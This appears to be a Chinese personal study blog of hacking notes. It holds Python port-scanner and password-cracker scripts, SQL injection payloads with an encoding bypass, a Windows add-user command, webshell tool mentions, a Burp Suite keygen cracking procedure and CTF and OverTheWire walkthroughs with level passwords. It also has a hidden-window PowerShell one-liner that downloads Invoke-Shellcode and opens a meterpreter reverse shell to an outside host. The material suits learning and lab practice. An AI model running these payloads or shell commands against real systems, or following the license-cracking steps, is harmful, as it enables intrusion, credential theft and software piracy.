Dark_Study

Violent_Python(灰帽黑客)

一个简单的端口扫描器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#!/usr/bin/env python

import socket
import os
import sys


def retBanner(ip, port):
"""
socket连接
"""
try:
socket.setdefaulttimeout(2)
s = socket.socket()
s.connect((ip, port))
banner = s.recv(1024)
return banner
except Exception as e:
return e


def checkVulns(banner, filename):
"""
读取一些软件版本
"""
f = open(filename, 'r')
for line in f.readlines():
if line.strip('\n') in str(banner):
print('[+] Server is vulnerable:' +
banner.decode('utf-8').strip('\n') + '\n')
f.close()


def main():
print(sys.argv)
# 判断是否传递文件参数
if len(sys.argv) == 2:
filename = sys.argv[1]
if not os.path.isfile(filename):
print('[-] ' + filename + 'does not exist')
exit(0)
elif not os.access(filename, os.R_OK):
print('[-] ' + filename + ' access denied.')
exit(0)
else:
print('[-] Usage: ' + str(sys.argv[0]) + ' <vuln filename>')
exit(0)

# telnet, ssh, smtp, http, imap, https
port_list = [21, 22, 25, 80, 110, 443]
for i in range(130, 135):
ip = '192.168.19.' + str(i)
for port in port_list:
banner = retBanner(ip, port)
if banner:
if type(banner) != bytes:
print('[+] ' + ip + ':' + str(banner))
else:
print('[+] ' + ip + ':' + \
banner.decode('utf-8').strip('\r\n'))

checkVulns(banner, filename)

if __name__ == "__main__":
main()

一个密码脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/usr/bin/env python

import crypt


def testPass(cryptPass):
# HX哈希加密
salt = cryptPass[0:2]
dictfile = open("dictionary.txt", "r")
for word in dictfile.readlines():
word = word.strip('\n')
cryptWord = crypt.crypt(word, salt)
# 要注意"\n"
if cryptPass.strip('\n') == cryptWord:
print("Found Password: ", word + '\n')
return
print("Password not Found !")
dictfile.close()
return


def main():
passfile = open("passwords.txt", "r")
for line in passfile.readlines():
# 密码格式"root:HXs8120d."
user = line.split(':')[0]
cryptPass = line.split(':')[1].strip('')
print("Cracking Password For: ", user)
testPass(cryptPass)
passfile.close()


if __name__ == '__main__':
main()

黑客秘笈:渗透测试实战

PowerShell

1
2
3
4
5
6
7
8
9
10
11
# 32位PS脚本
powershell.exe -NoP -NonI -W Hidden -Exec Bypass

-NoP --> 不加载当前用户的配置
-NonI --> 非交互模式
-W Hidden --> 把窗口隐藏
-Exec Bypass --> 绕过安全保护
-noexit --> 执行完不退出

# 64位PS脚本
%WinDir%\syswow64\windowspoershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass

Invoke–Shellcode.ps1脚本

  • https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1

  • %WinDir%\syswow64\windowspoershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient). DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke--Shellcode -Payload windows/meterpreter/reverse_https-Lhost 192.168.30.129 -Lport 80

  • 下载文件到目标

    %WinDir%\syswow64\windowspoershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "& {Import-Module [Path and File of PowerShell]; [Parameters]}"

  • b64编码

    %WinDir%\syswow64\windowspoershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc [Base64 Code]

Easy-P

ZeroNet

linux下运行Zeronet.sh

Tor,network设置no proxy

1
2
3
[global]
9150
9151

工具使用

小课程地址

安装Windows 2003企业版 x64
迅雷链接

VMware安装一个Server 2003的虚拟机

Key
BVPPQ-CDPXV-8JBRH-9H9T6-3RXV3

添加/删除程序,安装IIS,web服务允许asp

SQL注入

经典SQL注入
and 1=1 union select 1, @@version
查报错信息,sql版本信息,操作系统信息
/@@version

简单检测是否含有sql注入漏洞
经典 and 1=1
#链接后加 and 1=1
#链接后加 and 1=2

经典 ‘引号判断

and 1=2 union select 1,@@version,user()

PHP_GPC绕过
编码再编码
'编码为%27,%27再编码为%2527
#编码为%23

demo
?id=%2527 and 1=2 union select 1,2,user() %23

PHP修复SQL注入

类型强制转换
intval($id)

参数判断

1
2
3
4
5
if(!is_numeric($id))
{
echo "error";
exit()
}

PHP_GPC
require_once('common.php')

md5解密
www.cmd5.com

一句话木马asp

大马asp

添加windows用户
net user haha 123456 /add
net user

代码阅读能力

seay源代码审计系统

中国菜刀

啊D注入工具

CTF

Burp Suite_POST请求flag

安装Burp Suite Community Edition
下载地址

下载破解补丁1.7.34_Loader_Keygen
参考地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 破解流程(Win + Linxu)
首先,从BurpSuite官网,下载Community版本的安装包。
安装后,找到安装目录,安装目录下有个burpsuite_community.jar
把破解的pro版的jar包,改名为burpsuite_community.jar,替换原来的文件
修改BurpSuiteCommunity.vmoptions文件为以下内容:
-Xmx4096m
-Xbootclasspath/p:burp-loader-keygen.jar

打开burp-loader-keygen.jar
修改一个License Text
启动BurpSuiteCommunity.exe
取消协助,同意协议
把burp-loader-keygen的License复制到BurpSuite
点击,Manual activation获取Request
把获取的Request复制到burp-loader-keygen的Activation Request
把自动生成的Activation Response复制回BurpSuite
完成,开始使用

在谷歌访问http://120.24.86.145:8002/post/

直接语句都暴露出来了,what=’flag’

so,只要在post请求加一个value为flag的what键(key)就可以了

打开谷歌浏览器——设置——高级——系统——设置代理服务器
127.0.0.1 8081

打开BurpSuite——Proxy——Opitions
选中修改为127.0.01:8081

然后刷新http://120.24.86.145:8002/post/

在BurpSuite查看Proxy的Intercept发现是get请求模式,so,改为post
在Raw里右键Change request method,改为了post请求

添加键值对
记得把Raw里面最后的空行清除后,回车添加一个空行再输入键值对,否则相当于请求一个有键值对的body,和一个空body
what=flag

之后可以右键Send to Repeater继续修改请求,也可以直接Forward放行包

Repeater

Forward之后flag会直接在浏览器渲染出来

配置Jython的jar包
文件链接

Scapy

sudo权限下使用,否则报拒绝连接错误
pip3 install scapy

1
2
3
4
target = 'www.baidu.com'
ip = IP(src=target)
[p for p in ip]
test_ip = sr1(IP(dst='119.75.216.20')/ICMP()/b'haha')

Some_games

OverTheWire

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

ssh://bandit0:bandit0@bandit.labs.overthewire.org:2220
password > reademe
cat readme

ssh://bandit1:boJ9jbbUNNfktd78OOpsqOltutMc3MY1@bandit.labs.overthewire.org:2220
password > dashed filename(读取虚线文件名)
`cat <-`

ssh://bandit2:CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9@bandit.labs.overthewire.org:2220
password > spaces in filename(读取带空格的文件名)
cat "spaces in this filename"

ssh://bandit3:UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK@bandit.labs.overthewire.org:2220
password > cat hidden file(读取隐藏文件)
cat inhere/.hidden

ssh://bandit4:pIwrPrtPN36QITSp3EQaw936yaFoFgAB@bandit.labs.overthewire.org:2220
password > human word(读取非乱码文件)

koReBOKuIDDepwhWk7jZC0RTdopnAYKh
0%